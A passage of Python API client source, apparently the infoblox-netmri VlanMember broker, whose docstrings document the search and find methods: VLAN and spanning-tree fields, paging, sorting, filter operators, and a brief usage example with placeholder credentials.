:type StpForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned, and their results will be included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. This record will always be returned, although it may not be the first record in the page. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit is used to break the data into pages; the page beginning with the start record is returned. For example, with 100 records, a :limit of 10 and a :start of 10 returns records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO, used to locate a row position within the records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO, used to locate a row position within the records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network ID to which results will be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against vlan members, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
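**Example**

A minimal usage sketch. The client and broker setup here is an illustrative assumption in the style of the infoblox-netmri client conventions; the host, credentials, and VLAN names are hypothetical::

    from infoblox_netmri.client import InfobloxNetMRI

    # hypothetical connection details; adjust to your deployment
    client = InfobloxNetMRI(host="netmri.example.com",
                            username="admin",
                            password="secret")
    broker = client.get_broker("VlanMember")

    # fetch the first page of members of VLANs named 'VLAN0010'
    members = broker.search(VlanName=["VLAN0010"], start=0, limit=10)

    # a '/.../'-delimited query value performs a regular expression search
    prod_members = broker.search(query="/^PROD/")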
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)

def find(self, **kwargs):
"""Lists the available vlan members matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseBridgeAddress: The operator to apply to the field BaseBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseBridgeAddress: If op_BaseBridgeAddress is specified, the field named in this input will be compared to the value in BaseBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_f_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseBridgeAddress: If op_BaseBridgeAddress is specified, this value will be compared to the value in BaseBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_c_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseNumPorts: The operator to apply to the field BaseNumPorts. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseNumPorts: If op_BaseNumPorts is specified, the field named in this input will be compared to the value in BaseNumPorts using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_f_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseNumPorts: If op_BaseNumPorts is specified, this value will be compared to the value in BaseNumPorts using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_c_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BridgeMemberInd: The operator to apply to the field BridgeMemberInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BridgeMemberInd: If op_BridgeMemberInd is specified, the field named in this input will be compared to the value in BridgeMemberInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_f_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BridgeMemberInd: If op_BridgeMemberInd is specified, this value will be compared to the value in BridgeMemberInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_c_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RootBridgeAddress: The operator to apply to the field RootBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RootBridgeAddress: If op_RootBridgeAddress is specified, the field named in this input will be compared to the value in RootBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_f_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RootBridgeAddress: If op_RootBridgeAddress is specified, this value will be compared to the value in RootBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_c_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeForwardDelay: The operator to apply to the field StpBridgeForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, the field named in this input will be compared to the value in StpBridgeForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_f_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, this value will be compared to the value in StpBridgeForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_c_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeHelloTime: The operator to apply to the field StpBridgeHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, the field named in this input will be compared to the value in StpBridgeHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_f_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, this value will be compared to the value in StpBridgeHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_c_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeMaxAge: The operator to apply to the field StpBridgeMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, the field named in this input will be compared to the value in StpBridgeMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_f_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, this value will be compared to the value in StpBridgeMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_c_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpDesignatedRoot: The operator to apply to the field StpDesignatedRoot. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpDesignatedRoot: If op_StpDesignatedRoot is specified, the field named in this input will be compared to the value in StpDesignatedRoot using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_f_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpDesignatedRoot: If op_StpDesignatedRoot is specified, this value will be compared to the value in StpDesignatedRoot using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_c_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpForwardDelay: The operator to apply to the field StpForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpForwardDelay: If op_StpForwardDelay is specified, the field named in this input will be compared to the value in StpForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_f_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpForwardDelay: If op_StpForwardDelay is specified, this value will be compared to the value in StpForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_c_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHelloTime: The operator to apply to the field StpHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHelloTime: If op_StpHelloTime is specified, the field named in this input will be compared to the value in StpHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_f_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHelloTime: If op_StpHelloTime is specified, this value will be compared to the value in StpHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_c_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHoldTime: The operator to apply to the field StpHoldTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second. For the between operator, the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
